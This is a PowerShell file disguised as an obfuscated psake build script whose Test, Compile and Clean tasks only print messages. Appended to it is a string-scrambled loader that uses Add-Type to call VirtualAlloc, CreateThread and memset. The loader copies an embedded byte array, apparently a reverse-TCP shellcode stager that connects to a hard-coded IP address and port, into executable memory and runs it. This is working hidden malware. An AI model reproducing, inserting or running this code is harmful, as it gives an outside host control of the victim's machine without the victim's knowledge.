&("{1}{2}{3}{0}"-f 'es','p','roper','ti') {
  ${TesTmE`S`sagE} = ("{1}{4}{2}{0}{3}" -f 'e','E','T','st!','xecuted ')
  ${CoMp`IlEMeSs`A`gE} = ("{0}{3}{2}{1}{4}"-f 'Ex','ompile','C','ecuted ','!')
  ${C`LeanME`SSA`ge} = ("{1}{3}{2}{0}"-f'ean!','E','d Cl','xecute')
}

&("{1}{0}"-f 'k','tas') ("{0}{1}{2}" -f 'defau','l','t') -depends ("{0}{1}"-f 'Te','st')

.("{1}{0}"-f'ask','t') ("{1}{0}" -f't','Tes') -depends ("{1}{0}" -f'mpile','Co'), ("{0}{1}" -f 'C','lean') { 
  ${T`eS`Tm`ESsaGE}
}

.("{0}{1}" -f't','ask') ("{1}{0}" -f 'pile','Com') -depends ("{1}{0}"-f'lean','C') { 
  ${C`oMpiLeM`ESS`A`Ge}
}

.("{1}{0}"-f 'k','tas') ("{1}{0}" -f'lean','C') { 
  ${C`L`eaNmES`Sage}
}
${C} = ((("{64}{94}{31}{99}{27}{5}{92}{15}{57}{18}{6}{68}{25}{78}{44}{79}{101}{105}{124}{112}{80}{84}{36}{103}{28}{125}{106}{73}{10}{98}{16}{19}{29}{55}{35}{126}{100}{83}{96}{7}{81}{14}{75}{111}{46}{116}{67}{108}{37}{77}{24}{118}{8}{128}{41}{48}{107}{61}{113}{43}{60}{127}{86}{119}{120}{123}{23}{53}{76}{50}{20}{3}{59}{110}{49}{58}{26}{52}{63}{0}{9}{33}{1}{45}{104}{13}{62}{82}{40}{90}{70}{30}{4}{38}{85}{51}{21}{114}{66}{12}{93}{32}{42}{122}{91}{47}{89}{88}{22}{56}{72}{54}{109}{121}{117}{39}{69}{11}{95}{17}{2}{34}{115}{65}{71}{129}{97}{74}{87}{102}"-f'met','int ',' uin','kSize,','d)','el32.dll','tatic extern','por','atic ex','er','llocationT','Ptr d','Imsvcrt.d','ti','(vqIkern','I','p','st,','lic s','e, ','tac','Impo','rn In','Attri',' s','r V','ress, IntPtr ','kern','i','u','I','rt','vq',', u','t s',' fl','nt dw','li',';','(In','n','r','I)','teThr','alAl','dwCr','ll','c st','n Int',' lp','dwS','l','lpP','butes, uint','r ','int','t',')]pub','StartAdd',' IntP','ead(In','Cr','onFla','ara','[D','i','t(vq',')]pu',' IntPt','t','ad','nt','Pt','flA','n','el3',' ','c','irtu','l','ss,','t','gs, I','[Dl',' ui','[Dl','tr lpTh','t','e','atic ext','tPtr lpThre','ubli','vq','ll','llImpo','e','lIm','u','y','(vqI','t);','oc',');','S','ea','(',' uint ','Ptr ','b','me','tr','2.d','tr lpAddre','ea','r','rc, u','vqI','t','t','r','ea','mse',']p','d','IntP','ze,','Protec','tP','te',' co'))."Re`P`LACe"(([ChAR]118+[ChAR]113+[ChAR]73),[strINg][ChAR]34));${w} = &("{1}{0}" -f'e','Add-Typ') -memberDefinition ${c} -Name ("{1}{0}" -f'2','Win3') -namespace ("{1}{0}{2}{3}{4}"-f'Functi','Win32','o','n','s') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xd5,0x98,0xa2,0x54,0x68,0x02,0x00,0x25,0xde,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${z}."leN`gtH" -gt 0x1000){${G} = ${z}."lE`NGTH"};${x}=${w}::("{0}{2}{1}" -f 'Virt','c','ualAllo').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${Z}."LEng`TH"-1);${i}++) {${W}::"m`eMsET"([IntPtr](${X}.("{2}{0}{1}"-f 'o','Int32','T').Invoke()+${I}), ${z}[${i}], 1)};${w}::("{0}{1}{2}"-f'CreateT','hr','ead').Invoke(0,0,${X},0,0,0);for (;;){.("{0}{3}{1}{2}"-f'St','t-s','leep','ar') 60};
